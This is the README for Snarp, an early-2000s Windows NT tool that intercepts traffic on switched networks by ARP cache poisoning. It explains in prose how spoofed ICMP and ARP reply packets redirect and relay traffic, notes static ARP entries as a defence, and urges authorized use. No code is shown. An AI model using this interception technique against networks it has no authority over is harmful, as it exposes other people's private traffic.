Program: Snarp Version: 0.9f Author: Frank Knobbe (Frank@Knobbe.net) Date: 2-2-2001 Status: Public Pre-Release Distribution: free Platform: Currently only NT4.0 Dependencies: PCap driver, LibNetNT Usage: Run Snarp with -h or -? for parameters WHY --- Howdy, First off, let me say that I'm not a professional programmer. I started to program in C (Borland Turbo C) back in 87. For a while I was programming quite a bit under TOS (that's the OS of the Atari ST, GEM being the GUI), mainly a BBS system for Atari called ST-Sysop that tied into the German BBS network called PCNet. Since my move to the US I worked more in engineering and consulting, and have been using C only on occasion to hack together some tools. One of which was the POP2SMTP gateway, which was my first IP program. Naturally it was done using Windows sockets. With the PCap drivers for Windows available from http://netgroup-serv.polito.it/winpcap/ and the first port of LibNet by Ryan Permeh with eEye (http://www.eeye.com/html/tools/libnetnt.html), the power of packet sniffing and packet crafting finally came to the Windows world. In the Winter of 2000, I created a couple Ethernet cables that allow receiving of packets but prevent sending of packets. The ideal sniffer cable. However, one of the two cables (which are behaving like a Shomiti tap) works great on hubs, but it confuses switches. So I set out to write a program that allows sniffing of traffic on a switched network. My first step beyond sockets... HOW --- The program is called Snarp because is uses an ARP poisoning attack to cause a host to redirect traffic to the attacking machine (the machine running Snarp), and thus allowing that host to sniff the data from the wire. Snarp is run with the IP addresses or host names of these two hosts as parameters. First it sends a spoofed ICMP packet to target B with the source address of target A, and vice versa. This causes the two hosts to make a note of each others MAC address in their local ARP table (creating an entry if there was not already one for that host). Snarp then sends a spoofed ARP reply packet to these hosts, causing an update of the ARP table with the MAC address of the attacking machine. Most operating systems these days do not check if this ARP reply packet is actually a valid response to a query the host sent out. Call it a bug or laziness of the programmers, but it hurts the security of systems. Anyway, having sent the spoofed ARP reply (and successfully poisoned the ARP cache), host A now sends all packets, that were destined for host B, to the attacking machine. Snarp sniffs this traffic and then forwards it on to host B so that any communication between host A and B is not interrupted. Since the attacking machine receives all packets, a sniffer program like tcpdump, ngrep, or Sniffer Pro, can be run to examine all data. (Note that every packet will appear twice, once when received and again when relayed to the original destination.) The traffic relay occurs in a loop. Snarp keeps the ARP tables on both hosts updated by continuing to send spoofed ARP reply packets at a certain interval. Once you are finished observing traffic, simply hit the Escape key. Snarp now sends another spoofed ARP reply packet (which this time contains the correct MAC addresses of the hosts), and thereby restores the original traffic flow. It still relays any lingering packets for a few seconds and then exits. Snarp is written only for IP networks. Although it may be possible to attack other protocols (i.e. IPX) in a similar way (since the whole scheme is based on MAC addresses at the link layer), only IP is supported because Snarp uses the ARP protocol, and its flaws (or the flaws of the operating system's implementation of the IP stack). To prevent this attack from working, one can enter static entries in a hosts ARP table, which should not be overwritten with bogus ARP reply packets. A future version of Snarp will also include an ICMP redirect attack to still provide the functionality of rerouting traffic even if static ARP entries are used (or so is the plan...) *** Please use Snarp responsibly. I have written it as a proof of concept, but sometimes use it in troubleshooting. I urge you to use it only on networks where you are authorized to do so, and against data you are authorized to observe. Please do not misuse it for unethical or criminal purposes. Observing someone's data without permission and knowledge violates the privacy of that person's data, is unethical, and may be illegal (possibly leading to prosecution). *** The program appears to be running great under Windows NT 4.0. However, I was not successful with it under Windows 2000. Maybe there are still some bugs in LibNetNT, I will investigate this further when I have spare time. If anyone is able to get it to run under W2K, please let me know. It is not supported under Windows 9x/ME since it relies on the LibNetNT DLL. Attached is also WinPCap drivers for NT 4.0 and W2K and also the LibNetNT DLL. This is the version of LibNetNT that came with Snort 1.6 (another excellent port from the Unix world to the Windows world). If you have a LibNetNT DLL already installed, and you experience problems, use the attached one (recommended). The source code is attached as well. Be gentle with me, I mentioned in the beginning that I'm not a pro... Regards, Frank Knobbe (Frank@Knobbe.net)